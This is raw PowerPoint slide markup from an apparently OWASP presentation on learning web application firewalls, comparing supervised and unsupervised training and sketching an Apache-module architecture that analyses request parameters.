      <c:catAx>
        <c:axId val="32457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32459392"/>
        <c:crossesAt val="1.0000000000000002E-2"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="32459392"/>
        <c:scaling>
          <c:logBase val="10"/>
          <c:orientation val="minMax"/>
          <c:min val="1.0000000000000002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pl-PL" sz="1400"/>
                  <a:t>Missing ratie [%]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324578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21A3010-B114-46E4-BBC0-8DEBED3EC5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67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061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61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61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4683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886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626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550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397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3239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966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505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127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900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021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3928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447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2429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9838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199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5251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73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430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9664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322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11266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4657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20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597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0003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242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6994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637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03EC-E5B4-4FB8-AF2E-7A4ABE1C133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41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1447800" y="762000"/>
            <a:ext cx="7696200" cy="4953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latin typeface="Tahoma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762000"/>
            <a:ext cx="5867400" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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3260725"/>
            <a:ext cx="4648200" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="96969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latin typeface="Tahoma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5715000"/>
            <a:ext cx="9144000" cy="114935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8198" name="Picture 6" descr="owas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13716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038600" y="5165725"/>
            <a:ext cx="4191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solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copyright © The OWASP Foundation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.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609600"/>
            <a:ext cx="9144000" cy="1524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latin typeface="Tahoma" pitchFamily="34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6350" y="755650"/>
            <a:ext cx="1417638" cy="3740150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="003399">
              <a:alpha val="5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latin typeface="Tahoma" pitchFamily="34" charset="0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6350" y="5302250"/>
            <a:ext cx="1417638" cy="412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latin typeface="Tahoma" pitchFamily="34" charset="0"/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6350" y="4845050"/>
            <a:ext cx="1417638" cy="565150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="339933">
              <a:alpha val="71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latin typeface="Tahoma" pitchFamily="34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6350" y="2667000"/>
            <a:ext cx="1417638" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="003366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latin typeface="Tahoma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45256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latin typeface="Tahoma" pitchFamily="34" charset="0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217011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latin typeface="Tahoma" pitchFamily="34" charset="0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2641600"/>
            <a:ext cx="9144000" cy="26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latin typeface="Tahoma" pitchFamily="34" charset="0"/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4038600" y="5937250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EAEAEA"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The OWASP Foundation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846296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latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8221" name="Freeform 29"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2705100" y="2667000"/>
            <a:ext cx="1028700" cy="1219200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 456"/>
              <a:gd name="T1" fmla="*/ 0 h 528"/>
              <a:gd name="T2" fmla="*/ 0 w 456"/>
              <a:gd name="T3" fmla="*/ 528 h 528"/>
              <a:gd name="T4" fmla="*/ 192 w 456"/>
              <a:gd name="T5" fmla="*/ 528 h 528"/>
              <a:gd name="T6" fmla="*/ 452 w 456"/>
              <a:gd name="T7" fmla="*/ 260 h 528"/>
              <a:gd name="T8" fmla="*/ 456 w 456"/>
              <a:gd name="T9" fmla="*/ 1 h 528"/>
              <a:gd name="T10" fmla="*/ 0 w 456"/>
              <a:gd name="T11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22" name="Freeform 30"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="7385050" y="2667000"/>
            <a:ext cx="1028700" cy="1219200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 456"/>
              <a:gd name="T1" fmla="*/ 0 h 528"/>
              <a:gd name="T2" fmla="*/ 0 w 456"/>
              <a:gd name="T3" fmla="*/ 528 h 528"/>
              <a:gd name="T4" fmla="*/ 192 w 456"/>
              <a:gd name="T5" fmla="*/ 528 h 528"/>
              <a:gd name="T6" fmla="*/ 452 w 456"/>
              <a:gd name="T7" fmla="*/ 260 h 528"/>
              <a:gd name="T8" fmla="*/ 456 w 456"/>
              <a:gd name="T9" fmla="*/ 1 h 528"/>
              <a:gd name="T10" fmla="*/ 0 w 456"/>
              <a:gd name="T11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0" y="422910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77777"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP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4038600" y="6326188"/>
            <a:ext cx="480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u="sng">
                <a:solidFill>
                  <a:srgbClr val="EAEAEA"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="EAEAEA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17D512-3227-46B3-9CA7-45C3C51FDF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0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84CB38-9B7E-490C-A989-E09FC8209C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1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B97898-EB77-4B20-B26F-6ED85A39F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A73FF7-BC5C-4D89-94D6-820EDEE6B0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8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E616C2-7967-4177-86B9-B3ECB15F6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7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C64E6-4F96-4BD9-8EA5-0BDD94A8A7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1189AA-D168-49D4-A54F-1E534CF3EE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9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CE7CC0-25F3-4939-94D4-7483EEF0AF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7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CD2592-A7D3-4FCB-AD83-073A43CC6F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5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D51A7B-7076-4CB0-9C75-B27368D88F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4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711950"/>
            <a:ext cx="9144000" cy="1524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033" name="Picture 9" descr="owas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48400"/>
            <a:ext cx="381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969696"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2F8059AD-977C-4DBD-BB1A-705CD80B93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5689600" y="6270625"/>
            <a:ext cx="238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>
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP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ebdings" pitchFamily="18" charset="2"/>
        <a:buChar char="&lt;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ebdings" pitchFamily="18" charset="2"/>
        <a:buChar char="4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zachara@agh.edu.pl" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:dpalka@up.krakow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900B0B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Learning Web Application Firewall – Benefits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="900B0B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="900B0B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and Caveats</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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3429000"/>
            <a:ext cx="4343399" cy="1676400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Dariusz Pałka</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Pedagogical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>University</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Cracow</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>dpalka@up.krakow.pl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Marek Zachara</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>University</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" smtClean="0"/>
              <a:t> of Science and Technology (AGH) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Cracow</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>mzachara@agh.edu.pl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="pl-PL" sz="1400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Learning Web Application Firewall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693864" cy="4104456"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Prostokąt 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716016" y="1700808"/>
            <a:ext cx="3744416" cy="4248472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/>
              <a:t>Black Box</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Prostokąt 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4283968" y="2492896"/>
            <a:ext cx="144016" cy="27363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844413" y="2052517"/>
            <a:ext cx="1023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WAF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1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Learning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Patterns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Triggered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>upervised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>) learning (TL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Benefits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>consider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> the data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>retention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> period </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>store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historical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Resistant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>targeting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>its</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> learning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Drawabacks</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>The learning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>must</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>completed</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>A WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>must</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>manualy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> re-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>trained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changes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>protected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>appliaction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80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Learning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>atterns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</p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Continuous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>unsupervised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>learning (CL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>A WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>will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accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>values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match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>recent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>patterns</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>The firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>may</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>susceptible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>specially</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>engineered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>attacks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target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>its</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> learning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>process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32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Implementation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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>WAF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implemented</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> as Apache Server module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>incoming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> POST and GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>parameters</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>analysis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conducted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>basis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>multi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>similar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> to the one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>presented</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> by Giovani </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>University</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> of California) and Christopher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Krugel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> (Technical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>University</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Vienna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>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63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rostokąt 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414093" y="1340768"/>
            <a:ext cx="7550395" cy="17101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Schemat blokowy: proces 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704229" y="4041069"/>
            <a:ext cx="1440160" cy="2088232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WAF Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Schemat blokowy: proces 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1484785"/>
            <a:ext cx="720080" cy="14401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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Schemat blokowy: proces 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="1844825"/>
            <a:ext cx="1224136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CORE_IN</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Schemat blokowy: proces 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987824" y="1844825"/>
            <a:ext cx="1224136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SSL_IN</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Schemat blokowy: proces 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6588224" y="1844825"/>
            <a:ext cx="1224136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HTTP_IN</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Schemat blokowy: proces 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8028384" y="1484785"/>
            <a:ext cx="810816" cy="14401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Req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>processing</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Schemat blokowy: proces 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
